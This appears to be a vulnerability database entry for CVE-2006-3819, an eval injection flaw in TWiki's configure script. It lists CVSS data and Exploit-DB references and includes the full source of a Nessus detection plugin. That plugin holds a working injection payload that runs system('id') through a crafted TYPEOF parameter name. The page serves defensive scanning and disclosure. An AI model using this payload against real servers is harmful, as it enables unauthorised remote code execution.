Vulnerabilities > CVE-2006-3819 - Remote Command Execution vulnerability in TWiki Configure Script TYPEOF Parameter

CVSS 7.5 - HIGH

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

PARTIAL

Integrity impact

PARTIAL

Availability impact

PARTIAL

network

low complexity

twiki

nessus

exploit available

NVD

Published: 2006-07-27

Updated: 2017-07-20

Summary

Eval injection vulnerability in the configure script in TWiki 4.0.0 through 4.0.4 allows remote attackers to execute arbitrary Perl code via an HTTP POST request containing a parameter name starting with "TYPEOF".

Vulnerable Configurations

Part	Description	Count
Application	Twiki Twiki Twiki 4.0 Twiki Twiki 4.0.0 Twiki Twiki 4.0.1 Twiki Twiki 4.0.2 Twiki Twiki 4.0.3 Twiki Twiki 4.0.4	6

Exploit-Db

description	TWiki <= 4.0.4 (configure) Remote Command Execution Exploit. CVE-2006-3819. Webapps exploit for php platform
id	EDB-ID:2143
last seen	2016-01-31
modified	2006-08-07
published	2006-08-07
reporter	Javier Olascoaga
source	https://www.exploit-db.com/download/2143/
title	TWiki <= 4.0.4 configure Remote Command Execution Exploit

description	TWiki <= 4.0.4 (Configure Script) Remote Code Execution Exploit (meta). CVE-2006-3819. Webapps exploit for php platform
id	EDB-ID:2110
last seen	2016-01-31
modified	2006-08-02
published	2006-08-02
reporter	David Maciejak
source	https://www.exploit-db.com/download/2110/
title	TWiki <= 4.0.4 Configure Script Remote Code Execution Exploit meta

Nessus

NASL family	CGI abuses
NASL id	TWIKI_CONFIGURE_CMD_EXEC.NASL
description	The version of TWiki installed on the remote host uses an unsafe
last seen	2020-06-01
modified	2020-06-02
plugin id	22123
published	2006-07-31
reporter	This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/22123
title	TWiki configure Script Arbitrary Command Execution
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(22123); script_version("1.18"); script_cvs_date("Date: 2018/08/01 17:36:12"); script_cve_id("CVE-2006-3819"); script_bugtraq_id(19188); script_xref(name:"EDB-ID", value:"2110"); script_xref(name:"EDB-ID", value:"2143"); script_name(english:"TWiki configure Script Arbitrary Command Execution"); script_summary(english:"Attempts to run a command using TWiki."); script_set_attribute(attribute:"synopsis", value: "The remote web server hosts a CGI script that is affected by an arbitrary command execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of TWiki installed on the remote host uses an unsafe 'eval' in the 'bin/configure' script that can be exploited by an unauthenticated attacker to execute arbitrary Perl code subject to the privileges of the web server user id."); script_set_attribute(attribute:"see_also", value:"http://twiki.org/cgi-bin/view/Codev/SecurityAlertCmdExecWithConfigure"); script_set_attribute(attribute:"solution", value: "Apply HotFix 2 or later for TWiki 4.0.4. Alternatively, restrict access to the TWiki configure script."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"vuln_publication_date", value:"2006/07/27"); script_set_attribute(attribute:"patch_publication_date", value:"2006/07/26"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/07/31"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:twiki:twiki"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("twiki_detect.nasl"); script_require_ports("Services/www", 80); script_require_keys("installed_sw/TWiki"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("url_func.inc"); include("install_func.inc"); app = "TWiki"; get_install_count(app_name:app, exit_if_zero:TRUE); port = get_http_port(default:80); install = get_single_install( app_name : app, port : port ); dir = install['path']; install_url = build_url(port:port, qs:dir); if ("cgi-bin" >!< dir) { dir = ereg_replace(pattern:"(/[^/]+/).", string:dir, replace:"\1"); dir = dir + "bin/"; } else dir = dir - "view"; url = "configure"; # Check whether the affected script exists. res = http_send_recv3( method : "GET", item : dir + url, port : port, exit_on_fail : TRUE ); # If it does... if ('name="action" value="update"' >< res[2]) { # Try to exploit the flaw to run a command. cmd = "id"; sploit = "TYPEOF:);system('"+ cmd +"');my @a=("; postdata = "action=update&" + urlencode(str:sploit) + "=nessus"; res = http_send_recv3( method : "POST", item : dir + url, port : port, content_type : "application/x-www-form-urlencoded", data : postdata, exit_on_fail : TRUE ); line = egrep(pattern:"uid=[0-9]+.gid=[0-9]+.*", string:res[2]); if (!empty_or_null(line)) { security_report_v4( port : port, severity : SECURITY_HOLE, cmd : cmd, request : make_list(http_last_sent_request()), output : chomp(line) ); exit(0); } else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url); } else exit(0, "The '/" + url + "' script does not appear to be accessible on the " + app + " install at " + install_url);

Summary

Vulnerable Configurations

Exploit-Db

Nessus

References